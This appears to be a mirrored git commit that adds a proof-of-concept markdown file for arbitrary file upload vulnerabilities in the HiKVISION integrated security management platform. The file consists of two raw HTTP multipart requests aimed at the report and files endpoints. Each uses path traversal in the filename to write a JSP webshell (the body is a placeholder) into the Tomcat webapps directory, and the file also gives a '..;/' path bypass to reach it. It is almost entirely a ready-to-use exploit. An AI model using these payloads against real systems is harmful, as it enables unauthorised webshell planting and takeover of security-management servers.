mirror of
https://github.com/wooluo/POC00.git
synced 2026-07-22 23:25:35 +08:00
Create HiKVISION 综合安防管理平台 任意文件上传漏洞.md
This commit is contained in:
32
HiKVISION 综合安防管理平台 任意文件上传漏洞.md
Normal file
32
HiKVISION 综合安防管理平台 任意文件上传漏洞.md
Normal file
@@ -0,0 +1,32 @@
|
|||||||
|
## HiKVISION 综合安防管理平台 report 任意文件上传漏洞
|
||||||
|
|
||||||
|
```
|
||||||
|
POST /svm/api/external/report HTTP/1.1
|
||||||
|
Host: 10.10.10.10
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
|
||||||
|
Content-Type: application/zip
|
||||||
|
|
||||||
|
<%jsp的马%>
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a--
|
||||||
|
|
||||||
|
马儿路径:/portal/ui/login/..;/..;/new.jsp
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
## HiKVISION 综合安防管理平台 files 任意文件上传漏洞
|
||||||
|
```
|
||||||
|
POST /center/api/files;.html HTTP/1.1
|
||||||
|
Host: 10.10.10.10
|
||||||
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a
|
||||||
|
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
|
||||||
|
Content-Type: application/zip
|
||||||
|
|
||||||
|
<%jsp的马%>
|
||||||
|
------WebKitFormBoundary9PggsiM755PLa54a--
|
||||||
|
```
|
||||||
Reference in New Issue
Block a user